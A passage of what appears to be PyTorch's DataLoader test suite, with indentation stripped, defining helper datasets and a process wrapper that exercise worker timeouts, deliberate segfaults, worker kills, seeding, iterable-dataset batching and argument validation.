super(ErrorTrackingProcess, self).__init__(**kwargs)
self._pconn, self._cconn = mp.Pipe()
self._exception = None
self.disable_stderr = disable_stderr
def run(self):
set_faulthander_if_available()
if self.disable_stderr:
# Disable polluting stderr with errors that are supposed to happen.
with open(os.devnull, 'w') as devnull:
os.dup2(devnull.fileno(), sys.stderr.fileno())
try:
super(ErrorTrackingProcess, self).run()
self._cconn.send(None)
except Exception:
self._cconn.send(ExceptionWrapper(sys.exc_info()))
raise
def print_traces_of_all_threads(self):
assert self.is_alive(), "can only use print_traces_of_all_threads if the process is alive"
assert not self.disable_stderr, "do not disable stderr if you use print_traces_of_all_threads"
# On platforms without `SIGUSR1`, `set_faulthander_if_available` sets
# `faulthandler.enable()`, and `print_traces_of_all_threads` may kill
# the process. So let's poll the exception first
_ = self.exception
print_traces_of_all_threads(self.pid)
@property
def exception(self):
if self._pconn.poll():
self._exception = self._pconn.recv()
if self._exception is None:
return None
else:
return self._exception.exc_type(self._exception.exc_msg)
# ESRCH means that os.kill can't finds alive proc
def send_signal(self, signum, ignore_ESRCH=False):
try:
os.kill(self.pid, signum)
except OSError as e:
if not ignore_ESRCH or e.errno != errno.ESRCH:
raise
class ErrorDataset(Dataset):
def __init__(self, size):
self.size = size
def __len__(self):
return self.size
class SegfaultDataset(Dataset):
def __init__(self, size):
self.size = size
def __getitem__(self, idx):
return ctypes.string_at(0)
def __len__(self):
return self.size
class SleepDataset(Dataset):
def __init__(self, size, sleep_sec):
self.size = size
self.sleep_sec = sleep_sec
self.sleeped = False
def __getitem__(self, idx):
if not self.sleeped:
time.sleep(self.sleep_sec)
self.sleeped = True
return idx
def __len__(self):
return self.size
class SeedDataset(Dataset):
def __init__(self, size):
self.size = size
def __getitem__(self, idx):
return torch.initial_seed()
def __len__(self):
return self.size
class WorkerSpecificIterableDataset(IterableDataset):
def __init__(self, sizes_for_all_workers):
self.sizes_for_all_workers = sizes_for_all_workers
def __iter__(self):
worker_info = torch.utils.data.get_worker_info()
assert worker_info is not None
return iter(range(self.sizes_for_all_workers[worker_info.id]))
def __len__(self):
return sum(self.sizes_for_all_workers)
# Inspired by https://stackoverflow.com/a/26703365
# If all workers will call `sync_once`, they will be blocked until all workers
# reach the call (i.e., acting like a barrier).
# This can be used to ensure that each worker at least processes one data.
class SynchronizedDataset(Dataset):
def __init__(self, size, batch_size, num_workers):
assert size >= num_workers * batch_size
self.count = mp.Value('i', 0, lock=True)
self.barrier = mp.Semaphore(0)
self.num_workers = num_workers
self.size = size
def sync_once(self):
with self.count.get_lock():
self.count.value += 1
if self.count.value == self.num_workers:
self.barrier.release()
self.barrier.acquire()
self.barrier.release()
def __getitem__(self, idx):
raise NotImplementedError
def __len__(self):
return self.size
class EmptyTensorDataset(torch.utils.data.Dataset):
def __init__(self, len):
self.len = len
def __len__(self):
return self.len
def __getitem__(self, any):
return torch.empty(0)
class SynchronizedSeedDataset(SynchronizedDataset):
def __getitem__(self, idx):
self.sync_once()
return torch.initial_seed()
def _test_timeout(persistent_workers):
dataset = SleepDataset(10, 3)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, timeout=1,
persistent_workers=persistent_workers)
_ = next(iter(dataloader))
def _test_timeout_pin_memory(persistent_workers):
dataset = SleepDataset(10, 3)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, timeout=1, pin_memory=True,
persistent_workers=persistent_workers)
_ = next(iter(dataloader))
def _test_large_sampler_indices(persistent_workers):
# See
# test_large_sampler_indices
# https://github.com/pytorch/pytorch/issues/48666
dataloader = torch.utils.data.DataLoader(
EmptyTensorDataset(10000000),
batch_size=40960,
persistent_workers=persistent_workers,
num_workers=1)
it = iter(dataloader)
for x in it:
assert x.numel() == 0
raise RuntimeError('My Error')
def disable_stderr(worker_id):
r"""
Avoids printing "ERROR: Unexpected segmentation fault encountered in worker."
from workers. Since worker signal handler prints with low-level write(),
this has to be done on OS level via dup.
This is used as worker_init_fn for test_segfault.
"""
sys.stderr.flush() # flush library buffers that dup2 knows nothing about
# Can't use a with-block because otherwise the fd will be closed when this
# function ends.
with open(os.devnull, 'w') as devnull:
os.dup2(devnull.fileno(), sys.stderr.fileno())
def _test_segfault():
dataset = SegfaultDataset(10)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, worker_init_fn=disable_stderr)
_ = next(iter(dataloader))
def _test_no_segfault():
dataset = [1, 2, 3]
num_threads = torch.get_num_threads()
if num_threads < 4:
torch.set_num_threads(4)
else:
torch.set_num_threads(num_threads)
mp_ctx = torch.multiprocessing.get_context(method='fork')
dataloader = DataLoader(dataset, num_workers=1, worker_init_fn=disable_stderr,
multiprocessing_context=mp_ctx)
_ = next(iter(dataloader))
class TestProperExitDataset(Dataset):
def __init__(self, size, error_event):
self.size = size
self.error_event = error_event
def __len__(self):
return self.size
def __getitem__(self, idx):
worker_info = torch.utils.data.get_worker_info()
if self.error_event is not None and self.error_event.is_set() and \
worker_info.id == worker_info.num_workers - 1:
# only error in the last worker
raise RuntimeError('Worker error')
return torch.tensor([idx])
class TestProperExitIterableDataset(IterableDataset):
def __init__(self, size, error_event):
self.error_event = error_event
self.size = size
self.remaining = size
def __len__(self):
return self.size
def __iter__(self):
return self
def __next__(self):
worker_info = torch.utils.data.get_worker_info()
if self.error_event is not None and self.error_event.is_set() and \
worker_info.id == worker_info.num_workers - 1:
# only error in the last worker
raise RuntimeError('Worker error')
self.remaining -= 1
if self.remaining < 0:
raise StopIteration
return torch.tensor(-1000)
next = __next__ # py2 compatibility
# See TestDataLoader.test_proper_exit for usage
def _test_proper_exit(is_iterable_dataset, use_workers, pin_memory, exit_method,
hold_iter_reference, loader_setup_event, tester_setup_event,
persistent_workers):
num_workers = 2 if use_workers else 0
if exit_method == 'worker_error' or exit_method == 'worker_kill':
assert use_workers is True
if exit_method == 'worker_error':
worker_error_event = mp.Event()
else:
worker_error_event = None
if is_iterable_dataset:
ds = TestProperExitIterableDataset(7, worker_error_event)
else:
ds = TestProperExitDataset(12, worker_error_event)
loader = DataLoader(ds, batch_size=1, shuffle=False,
num_workers=num_workers, pin_memory=pin_memory,
worker_init_fn=set_faulthander_if_available,
persistent_workers=persistent_workers)
error_it = 2
if use_workers:
# 2 is the magical per-worker prefetch number...
# FIXME: change this after the number becomes configurable.
if is_iterable_dataset:
assert len(ds) * num_workers > (error_it + 2 + 1)
else:
assert len(loader) > (error_it + 2 + 1) * num_workers
else:
if is_iterable_dataset:
assert len(ds) > error_it + 1
else:
assert len(loader) > error_it + 1
it = iter(loader)
if use_workers:
workers = it._workers
def kill_pid(pid):
psutil_p = psutil.Process(pid)
psutil_p.kill()
psutil_p.wait(JOIN_TIMEOUT)
assert not psutil_p.is_running()
for i, _ in enumerate(it):
if i == 0:
if not hold_iter_reference:
del it
del loader
loader_setup_event.set()
tester_setup_event.wait()
# ensure that the workers are still alive
if use_workers:
for w in workers:
assert w.is_alive()
if worker_error_event is not None:
worker_error_event.set()
if i == error_it:
if exit_method == 'loader_error':
raise RuntimeError('Loader error')
elif exit_method == 'loader_kill':
kill_pid(os.getpid())
elif exit_method == 'worker_kill':
kill_pid(workers[-1].pid) # kill last worker
if not hold_iter_reference:
# Tries to trigger the __del__ clean-up rather than the automatic
# exiting of daemonic children. Technically it should be automatically
# triggered, but I don't want to rely on the implementation detail of
# Python gc.
gc.collect()
class TestWorkerInfoDataset(SynchronizedDataset):
def __getitem__(self, idx):
self.sync_once()
return torch.tensor(self.value)
# Should be used as worker_init_fn with TestWorkerInfoDataset.
# See _test_get_worker_info below for usage.
def _test_worker_info_init_fn(worker_id):
worker_info = torch.utils.data.get_worker_info()
assert worker_id == worker_info.id, "worker_init_fn and worker_info should have consistent id"
assert worker_id < worker_info.num_workers, "worker_init_fn and worker_info should have valid id"
assert worker_info.seed == torch.initial_seed(), "worker_init_fn and worker_info should have consistent seed"
dataset = worker_info.dataset
assert isinstance(dataset, TestWorkerInfoDataset), "worker_info should have correct dataset copy"
assert not hasattr(dataset, 'value'), "worker_info should have correct dataset copy"
# test that WorkerInfo attributes are read-only
try:
worker_info.id = 3999
except RuntimeError as e:
assert str(e) == "Cannot assign attributes to WorkerInfo objects"
try:
worker_info.a = 3
except RuntimeError as e:
assert str(e) == "Cannot assign attributes to WorkerInfo objects"
for k in ['id', 'num_workers', 'seed', 'dataset']:
assert "{}=".format(k) in repr(worker_info)
dataset.value = [worker_id, os.getpid()]
def _test_get_worker_info():
# get_worker_info returns None in main proc
assert torch.utils.data.get_worker_info() is None
num_workers = 2
batch_size = 2
dataset = TestWorkerInfoDataset(6, batch_size, num_workers)
dataloader = DataLoader(dataset, batch_size=batch_size,
num_workers=num_workers,
worker_init_fn=_test_worker_info_init_fn)
it = iter(dataloader)
data = []
for d in it:
data.append(d)
worker_pids = [w.pid for w in it._workers]
data = torch.cat(data, 0)
for d in data:
# each `d` is a [worker_id, worker_pid] pair, which is set in
# _test_worker_info_init_fn
assert d[1] == worker_pids[d[0]]
# get_worker_info returns None in main proc after data loading
assert torch.utils.data.get_worker_info() is None
# main proc dataset was never assigned this attribute
assert not hasattr(dataset, 'value')
try:
_ = dataset[0]
except AttributeError:
return
raise RuntimeError('Expected AttributeError')
# test custom init function
def init_fn(worker_id):
torch.manual_seed(12345)
# used with test_error_in_init
class ErrorIterableDataset(IterableDataset):
def __iter__(self):
raise RuntimeError("Error in __iter__")
# used with test_error_in_init
def error_worker_init_fn(_):
raise RuntimeError("Error in worker_init_fn")
class BulkLoadingDataset(Dataset):
def __init__(self, length):
self.length = length
def __getitem__(self, indices):
assert isinstance(indices, (list, tuple))
return torch.as_tensor(indices)
def __len__(self):
return self.length
class BulkLoadingSampler(torch.utils.data.Sampler):
def __init__(self, dataset, batch_size):
self.dataset = dataset
self.batch_size = batch_size
def __iter__(self):
for x in torch.randperm(len(self.dataset)).split(self.batch_size):
yield x.tolist()
def __len__(self):
return int(math.ceil(len(self.dataset) / float(self.batch_size)))
class CustomList(list):
pass
class CustomDict(dict):
pass
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
@unittest.skipIf(
TEST_WITH_ASAN,
"DataLoader tests hang in ASAN, see: https://github.com/pytorch/pytorch/issues/66223")
class TestDataLoader(TestCase):
def setUp(self):
super(TestDataLoader, self).setUp()
self.data = torch.randn(100, 2, 3, 5)
self.labels = torch.randperm(50).repeat(2)
self.dataset = TensorDataset(self.data, self.labels)
self.persistent_workers = False
def _get_data_loader(self, dataset, **kwargs):
persistent_workers = kwargs.get('persistent_workers', self.persistent_workers)
if persistent_workers and kwargs.get('num_workers', 0) == 0:
persistent_workers = False
kwargs['persistent_workers'] = persistent_workers
return DataLoader(dataset, **kwargs)
def _test_sequential(self, loader):
batch_size = loader.batch_size
if batch_size is None:
for idx, (sample, target) in enumerate(loader):
self.assertEqual(sample, self.data[idx])
self.assertEqual(target, self.labels[idx])
self.assertEqual(idx, len(self.dataset) - 1)
else:
for i, (sample, target) in enumerate(loader):
idx = i * batch_size
self.assertEqual(sample, self.data[idx:idx + batch_size])
self.assertEqual(target, self.labels[idx:idx + batch_size])
self.assertEqual(i, math.floor((len(self.dataset) - 1) / batch_size))
def _test_shuffle(self, loader):
found_data = {i: 0 for i in range(self.data.size(0))}
found_labels = {i: 0 for i in range(self.labels.size(0))}
batch_size = loader.batch_size
if batch_size is None:
for i, (batch_samples, batch_targets) in enumerate(loader):
sample, target = (batch_samples, batch_targets)
for data_point_idx, data_point in enumerate(self.data):
if data_point.eq(sample).all():
self.assertFalse(found_data[data_point_idx])
found_data[data_point_idx] += 1
break
self.assertEqual(target, self.labels[data_point_idx])
found_labels[data_point_idx] += 1
self.assertEqual(sum(found_data.values()), (i + 1))
self.assertEqual(sum(found_labels.values()), (i + 1))
self.assertEqual(i, (len(self.dataset) - 1))
else:
for i, (batch_samples, batch_targets) in enumerate(loader):
for sample, target in zip(batch_samples, batch_targets):
for data_point_idx, data_point in enumerate(self.data):
if data_point.eq(sample).all():
self.assertFalse(found_data[data_point_idx])
found_data[data_point_idx] += 1
break
self.assertEqual(target, self.labels[data_point_idx])
found_labels[data_point_idx] += 1
self.assertEqual(sum(found_data.values()), (i + 1) * batch_size)
self.assertEqual(sum(found_labels.values()), (i + 1) * batch_size)
self.assertEqual(i, math.floor((len(self.dataset) - 1) / batch_size))
def _test_error(self, loader):
it = iter(loader)
errors = 0
while True:
try:
next(it)
except NotImplementedError:
errors += 1
except StopIteration:
self.assertEqual(errors,
math.ceil(float(len(loader.dataset)) / loader.batch_size))
return
def test_error_in_init(self):
for num_workers in [0, 2]:
loader = self._get_data_loader(ErrorIterableDataset(), num_workers=num_workers)
with self.assertRaisesRegex(RuntimeError, 'Error in __iter__'):
list(iter(loader))
loader = self._get_data_loader(self.dataset, num_workers=2, worker_init_fn=error_worker_init_fn)
with self.assertRaisesRegex(RuntimeError, 'Error in worker_init_fn'):
list(iter(loader))
def test_typing(self):
from typing import List
# Make sure there is no TypeError
class SomeDatasetClass(Dataset[List[torch.Tensor]]):
pass
def _create_dataloader(is_train: bool) -> DataLoader[List[torch.Tensor]]:
pass
@unittest.skipIf(IS_SANDCASTLE, "subprocess doesn't work in FB internal CI")
@unittest.skipIf(IS_WINDOWS, "No 'resource' module on Windows")
def test_fd_limit_exceeded(self):
# See NOTE [ DataLoader on Linux and open files limit ]
import subprocess
subprocess.check_output([sys.executable, '-c', """\
import torch
import resource
from torch.utils.data import DataLoader, IterableDataset
class RandomDataset(IterableDataset):
def __init__(self, len, size):
super(RandomDataset).__init__()
self.len = len
self.size = size
def __iter__(self):
return self
def __next__(self):
if self.len <= 0:
raise StopIteration
self.len -= 1
return torch.randn(self.size)
try:
keep_fds_alive = []
resource.setrlimit(resource.RLIMIT_NOFILE, (100, 100))
for random_t in DataLoader(RandomDataset(200, (2,2)), multiprocessing_context="fork",
num_workers=1):
random_t.max(dim=0)
keep_fds_alive.append(random_t)
except RuntimeError as e:
assert "ulimit -n" in str(e)
assert "set_sharing_strategy" in str(e)
"""])
def test_invalid_assign_after_init(self):
dl = self._get_data_loader(self.dataset)
for attr in ('batch_size', 'sampler', 'batch_sampler', 'drop_last', 'dataset'):
def fn():
setattr(dl, attr, {})
self.assertRaises(ValueError, fn)
def test_sequential_nonbatch(self):
self._test_sequential(self._get_data_loader(self.dataset, batch_size=None))
def test_sequential_batch(self):
self._test_sequential(self._get_data_loader(self.dataset))
self._test_sequential(self._get_data_loader(self.dataset, batch_size=2))
def test_bulk_loading_nobatch(self):
n = 35
bs = 4
ds = BulkLoadingDataset(n)
sampler = BulkLoadingSampler(ds, batch_size=4)
for num_workers in [0, 4]:
dl = self._get_data_loader(ds, num_workers=num_workers, batch_size=None, sampler=sampler, pin_memory=TEST_CUDA)
self.assertFalse(dl._auto_collation)
samples = list(dl)
self.assertEqual(samples[0].is_pinned(), TEST_CUDA)
self.assertEqual(set(torch.cat(samples, 0).tolist()), set(range(n)))
def test_growing_dataset(self):
dataset = [torch.ones(4) for _ in range(4)]
dataloader_seq = self._get_data_loader(dataset, shuffle=False)
dataloader_shuffle = self._get_data_loader(dataset, shuffle=True)
dataset.append(torch.ones(4))
self.assertEqual(len(dataloader_seq), 5)
self.assertEqual(len(dataloader_shuffle), 5)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_sequential_pin_memory(self):
loader = self._get_data_loader(self.dataset, batch_size=2, pin_memory=True)
for input, target in loader:
self.assertTrue(input.is_pinned())
self.assertTrue(target.is_pinned())
def test_multiple_dataloaders(self):
for multiprocessing_context in supported_multiprocessing_contexts:
loader1_it = iter(self._get_data_loader(self.dataset, num_workers=1))
loader2_it = iter(self._get_data_loader(self.dataset, num_workers=2, multiprocessing_context=multiprocessing_context))
next(loader1_it)
next(loader1_it)
next(loader2_it)
next(loader2_it)
next(loader1_it)
next(loader2_it)
def test_segfault(self):
p = ErrorTrackingProcess(target=_test_segfault)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
if IS_WINDOWS:
self.assertIsInstance(p.exception, OSError)
self.assertRegex(str(p.exception), r'access violation reading ')
else:
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader worker \(pid \d+\) is killed by signal: ')
finally:
p.terminate()
# Tests if the child process forked by the DataLoader segfaults due to having more than 3 threads
# in the parent process after at least one set_num_threads invocation in the parent process.
# After forking, set_num_threads(1) in the child process entails handling some inherited data-structures
# of the Caffe2 thread-pool of the parent process, culminating in a segfault.
# Reference: https://github.com/pytorch/pytorch/issues/54752
@unittest.skipIf(IS_WINDOWS, "Needs fork")
def test_no_segfault(self):
p = ErrorTrackingProcess(target=_test_no_segfault)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
if p.exception:
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader worker \(pid \d+\) is killed by signal: ')
self.fail("Segfault occurred in worker process after fork")
finally:
p.terminate()
def test_timeout(self):
if TEST_CUDA and not NO_MULTIPROCESSING_SPAWN:
# This test runs in a subprocess, which can only initialize CUDA with spawn.
# _test_timeout_pin_memory with pin_memory=True initializes CUDA when the iterator is
# constructed.
targets = (_test_timeout, _test_timeout_pin_memory)
else:
targets = (_test_timeout,)
for target in targets:
p = ErrorTrackingProcess(target=target, args=(self.persistent_workers,))
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader timed out after \d+ seconds')
finally:
p.terminate()
def test_large_sampler_indices(self):
# Test that the data loader cleanly exit when the process errors
# 1. having an reference to the iterator
# 2. using a sampler that yields big elements s.t. _index_queues putters block
#
# More context: https://github.com/pytorch/pytorch/issues/48666
p = ErrorTrackingProcess(target=_test_large_sampler_indices, args=(self.persistent_workers,))
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'My Error')
finally:
p.terminate()
def test_invalid_ctor_args_combinations(self):
# general
with self.assertRaisesRegex(ValueError, "num_workers option should be non-negative"):
self._get_data_loader(self.dataset, num_workers=-1)
with self.assertRaisesRegex(ValueError, "timeout option should be non-negative"):
self._get_data_loader(self.dataset, timeout=-1)
# disable auto-batching
with self.assertRaisesRegex(ValueError,
"batch_size=None option disables auto-batching and is mutually exclusive"):
self._get_data_loader(self.dataset, batch_size=None, drop_last=True)
valid_ctx = list(torch.multiprocessing.get_all_start_methods())[-1]
with self.assertRaisesRegex(ValueError, r"multi-process loading \(num_workers > 0\), but got"):
self._get_data_loader(self.dataset, num_workers=0, multiprocessing_context=valid_ctx)
with self.assertRaisesRegex(ValueError, "should specify a valid start method in"):
self._get_data_loader(self.dataset, num_workers=1, multiprocessing_context='bad')
with self.assertRaisesRegex(TypeError, "multiprocessing_context option should be a valid context "):
self._get_data_loader(self.dataset, num_workers=1, multiprocessing_context=object())
# map-style
sampler = torch.utils.data.SequentialSampler(self.dataset)
batch_sampler = torch.utils.data.BatchSampler(sampler, 3, False)
with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
self._get_data_loader(self.dataset, batch_size=11, sampler=sampler, shuffle=True)
with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
self._get_data_loader(self.dataset, batch_sampler=batch_sampler, sampler=sampler, shuffle=True)
with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
self._get_data_loader(self.dataset, batch_sampler=batch_sampler, sampler=sampler, shuffle=3)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, batch_size=11, batch_sampler=batch_sampler)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, shuffle=True, batch_sampler=batch_sampler)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, drop_last=True, batch_sampler=batch_sampler)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, drop_last=3, batch_sampler=batch_sampler)
# iterable-style
dataset = CountingIterableDataset(20)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified shuffle"):
self._get_data_loader(dataset, shuffle=True)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified shuffle"):
self._get_data_loader(dataset, shuffle=3)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified sampler"):
self._get_data_loader(dataset, sampler=torch.utils.data.SequentialSampler(dataset))
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified sampler"):
self._get_data_loader(dataset, sampler=3)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified batch_sampler"):
self._get_data_loader(dataset, batch_sampler=torch.utils.data.BatchSampler(
torch.utils.data.SequentialSampler(dataset), 3, False))
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified batch_sampler"):
self._get_data_loader(dataset, batch_sampler=3)
def test_builtin_collection_conversion(self):
for coll_ty in (list, tuple):
for num_workers in (0, 1):
# map-style dataset
dataset = CountingDataset(20)
# no auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=None, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(range(20)))
# auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=2, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(torch.tensor([i, i + 1]) for i in range(0, 20, 2)))
# iterable-style dataset
dataset = CountingIterableDataset(20)
# no auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=None, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(range(20)))
# auto-batching
# this IterableDataset isn't configured for each worker, so for
# the equality test below to be valid, we cannot have more than 1 workers.
assert num_workers in [0, 1], "invalid test"
fetched = coll_ty(self._get_data_loader(dataset, batch_size=2, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(torch.tensor([i, i + 1]) for i in range(0, 20, 2)))
def test_iterable_style_dataset(self):
# [no auto-batching] single process loading
dataset = CountingIterableDataset(20)
dataloader = self._get_data_loader(dataset, batch_size=None)
fetched = list(dataloader)
self.assertEqual(len(fetched), 20)
for i, d in enumerate(fetched):
# non-batched should not convert ints into tensors
self.assertIsInstance(d, int)
self.assertEqual(d, i)
# DataLoader should match len of the iterable-style dataset (if implemented)
self.assertEqual(len(dataloader), len(dataset))
# [no auto-batching] multiprocessing loading
num_workers = 3
sizes_for_all_workers = [0, 4, 20]
expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
for prefetch_factor in [2, 3, 4]:
dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=None,
worker_init_fn=set_faulthander_if_available,
prefetch_factor=prefetch_factor)
dataloader_iter = iter(dataloader)
fetched = sorted(dataloader_iter)
for a, b in zip(fetched, expected):
# non-batched should not convert ints into tensors
self.assertIsInstance(a, int)
self.assertEqual(a, b)
# DataLoader should match len of the iterable-style dataset (if implemented)
self.assertEqual(len(dataloader), len(dataset))
# When loading more than len(dataset) data, after accessing len(dataloader),
# we should get a warning. See NOTE [ IterableDataset and __len__ ].
dataset = CountingIterableDataset(20)
dataloader = self._get_data_loader(dataset, num_workers=num_workers,
worker_init_fn=set_faulthander_if_available,
prefetch_factor=prefetch_factor)
it = iter(dataloader)
for _ in range(40):
self.assertNotWarn(lambda: next(it), "Should not warn before accessing len(dataloader)")
self.assertEqual(len(dataloader), len(dataset))
self.assertEqual(len(dataloader), 20)
it = iter(dataloader)
for _ in range(20):
self.assertNotWarn(lambda: next(it), "Should not warn before exceeding length")
for _ in range(3):
with self.assertWarnsRegex(
UserWarning,
r"but [0-9]+ samples have been fetched\. For multiprocessing data-loading, this",
msg="Should always warn after exceeding length"):
next(it)
# [no auto-batching] test that workers exit gracefully
workers = dataloader_iter._workers
del dataloader_iter
del dataloader
try:
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive())
self.assertEqual(w.exitcode, 0)
finally:
for w in workers:
w.terminate()
# [auto-batching] single process loading
dataset = CountingIterableDataset(20)
fetched = list(self._get_data_loader(dataset, batch_size=7))
self.assertEqual(len(fetched), 3)
self.assertEqual(fetched[0].tolist(), list(range(7)))
self.assertEqual(fetched[1].tolist(), list(range(7, 14)))
self.assertEqual(fetched[2].tolist(), list(range(14, 20)))
# [auto-batching] multiprocessing loading
num_workers = 3
sizes_for_all_workers = [0, 4, 20]
expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
for prefetch_factor in [2, 3, 4]:
dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
# worker 0 should return 0 batches
# worker 1 should return 1 batches
# worker 2 should return 3 batches
dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=7, prefetch_factor=prefetch_factor)
dataloader_iter = iter(dataloader)
fetched = list(dataloader_iter)
self.assertEqual(len(fetched), 4)
fetched = set(tuple(t.tolist()) for t in fetched)
self.assertEqual(fetched, {tuple(range(4)), tuple(range(7)), tuple(range(7, 14)), tuple(range(14, 20))})
# [auto-batching] test that workers exit gracefully
workers = dataloader_iter._workers
del dataloader_iter
del dataloader
try:
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive())
self.assertEqual(w.exitcode, 0)
finally:
for w in workers:
w.terminate()
# [auto-batching & drop_last] single process loading
dataset = CountingIterableDataset(20)
fetched = list(self._get_data_loader(dataset, batch_size=7, drop_last=True))
self.assertEqual(len(fetched), 2)
self.assertEqual(fetched[0].tolist(), list(range(7)))
self.assertEqual(fetched[1].tolist(), list(range(7, 14)))
# [auto-batching & drop_last] multiprocessing loading
num_workers = 3
sizes_for_all_workers = [0, 4, 20]
expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
for prefetch_factor in [2, 3, 4]:
dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
# worker 0 should return 0 batches
# worker 1 should return 1 batches
# worker 2 should return 3 batches
dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=7, drop_last=True,
worker_init_fn=set_faulthander_if_available,
prefetch_factor=prefetch_factor)
dataloader_iter = iter(dataloader)
fetched = list(dataloader_iter)
self.assertEqual(len(fetched), 2)
fetched = set(tuple(t.tolist()) for t in fetched)
self.assertEqual(fetched, {tuple(range(7)), tuple(range(7, 14))})
# [auto-batching & drop_last] test that workers exit gracefully
workers = dataloader_iter._workers
del dataloader_iter
del dataloader
try:
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive())
self.assertEqual(w.exitcode, 0)
finally:
for w in workers:
w.terminate()
def test_chain_iterable_style_dataset(self):
# chaining (concatenation)
dataset1 = CountingIterableDataset(20)
dataset2 = CountingIterableDataset(15)
expected = list(range(20)) + list(range(15))
for num_workers in [0, 1]:
for chained_dataset in [dataset1 + dataset2, ChainDataset([dataset1, dataset2])]:
fetched = list(self._get_data_loader(chained_dataset, num_workers=num_workers))
self.assertEqual(len(fetched), len(expected))
for e, d in zip(expected, fetched):
self.assertIsInstance(d, torch.Tensor)
self.assertEqual(e, d)
with self.assertRaisesRegex(AssertionError, "ChainDataset only supports IterableDataset"):
list(iter(dataset1 + self.dataset))
with self.assertRaisesRegex(AssertionError, "ChainDataset only supports IterableDataset"):
list(iter(ChainDataset([dataset1, self.dataset])))
def test_multiprocessing_contexts(self):
reference = [
torch.arange(3),
torch.arange(3, 6),
torch.arange(6, 9),
torch.arange(9, 11),
]
counting_ds_n = 11
dl_common_args = dict(num_workers=3, batch_size=3, pin_memory=(not TEST_CUDA))
for ctx in supported_multiprocessing_contexts:
# windows and jetson devices don't support sharing cuda tensor; ROCm does not yet fully support IPC
if ctx in ['spawn', 'forkserver'] and TEST_CUDA and not IS_WINDOWS and not IS_JETSON:
ds_cls = CUDACountingDataset
else:
ds_cls = CountingDataset
self.assertEqual(
reference, list(self._get_data_loader(ds_cls(counting_ds_n), multiprocessing_context=ctx, **dl_common_args)))
if ctx is not None:
# test ctx object
ctx = mp.get_context(ctx)
self.assertEqual(
reference, list(self._get_data_loader(ds_cls(counting_ds_n), multiprocessing_context=ctx, **dl_common_args)))
def test_worker_seed(self):
num_workers = 6
batch_size = 1
dataset = SynchronizedSeedDataset(num_workers, batch_size, num_workers)
dataloader = self._get_data_loader(dataset, batch_size=batch_size, num_workers=num_workers)
seeds = set()
for batch in dataloader:
seeds.add(batch[0])
self.assertEqual(len(seeds), num_workers)
def test_worker_seed_reproducibility(self):
def get_dataloader():
return DataLoader(dataset, batch_size=batch_size, num_workers=num_workers, generator=torch.Generator().manual_seed(42))
num_workers = 6
batch_size = 1
dataset = SynchronizedSeedDataset(num_workers, batch_size, num_workers)
self.assertEqual(set(int(batch) for batch in get_dataloader()), set(int(batch) for batch in get_dataloader()))
def test_worker_init_fn(self):
dataset = SeedDataset(4)
dataloader = self._get_data_loader(dataset, batch_size=2, num_workers=2,
worker_init_fn=init_fn)
for batch in dataloader:
self.assertEqual(12345, batch[0])
self.assertEqual(12345, batch[1])
def test_get_worker_info(self):
p = ErrorTrackingProcess(target=_test_get_worker_info)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
